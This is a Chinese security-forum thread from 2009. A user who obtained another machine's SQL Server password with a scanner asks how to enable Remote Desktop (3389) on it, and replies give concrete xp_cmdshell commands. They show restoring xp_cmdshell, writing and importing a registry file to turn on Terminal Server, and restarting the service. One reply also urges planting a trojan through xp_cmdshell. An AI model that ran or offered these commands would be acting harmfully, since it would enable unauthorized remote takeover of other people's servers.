标题:
如何开3389啊
[打印本页]
作者:
业余人
时间:
2009-6-9 16:09
标题:
如何开3389啊
我用WINNTAutoAttack扫到sql口令
但没开3389 怎样在WINNTAutoAttack上的sqlcmd上开启3389啊
求助啊
作者:
业余人
时间:
2009-6-9 16:11
补充 看了他的c盘 没有Documents and Settings
作者:
柔肠寸断
时间:
2009-6-9 23:08
不同的系统有不同的方法。。
作者:
saitojie
时间:
2009-6-10 16:46
能使用基于SQL的shell吗?也就是大家熟悉的"xp_cmdshell",如果不能使用,尝试下exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'看看能不能恢复,如果可以,再尝试使用这个shell编写一个批处理,直接对注册表进行操作,然后开启对方的3389。
作者:
业余人
时间:
2009-6-10 16:59
有那个sql的shell 对方是win2000server
你能不能说的详细点阿 谢了
我是菜鸟啊
作者:
saitojie
时间:
2009-6-10 18:01
我记不得太多了,因为现在手里的不是XP就是2003的系统,所以只能按照自己的模糊的记忆给你点提示了,不保证完全成功,你可以试试!
分别执行
命令一:
exec [master].[dbo].[xp_cmdshell] 'cd \ && c: && echo Windows Registry Editor Version 5.00 > 1.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> 1.reg && echo "ShutdownWithoutLogon"="0" >> 1.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >> 1.reg && echo "EnableAdminTSRemote"=dword:00000001 >> 1.reg && echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> 1.reg && echo "TSEnabled"=dword:00000001 >> 1.reg && echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 1.reg && echo "PortNumber"=dword:00000D3D >> 1.reg'
复制代码
命令二:
exec [master].[dbo].[xp_cmdshell] 'regedit /s c:\1.reg && net stop "Terminal Server" && net start "Terminal Server"'
复制代码
给你写了两条命令,这两条命令全部是在SQL的shell里面使用的,由于写的比较急,可能还存在问题吧,你可以试试!
作者:
业余人
时间:
2009-6-11 15:55
哦 非常谢谢
作者:
业余人
时间:
2009-6-11 17:40
我连了 可问题又来了 我输入正确的用户名密码后 提示用户名或密码错误
对方是内网 不知道和这个有没有关系
作者:
saitojie
时间:
2009-6-12 19:32
还提醒你一下,既然你都能执行xp_cmdshell了,为什么你还要去开别人的3389,还要去想办法主动连接别人,你就不能直接弄个马上去,使用xp_cmdshell执行了搞定吗?
何必这么麻烦!?
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
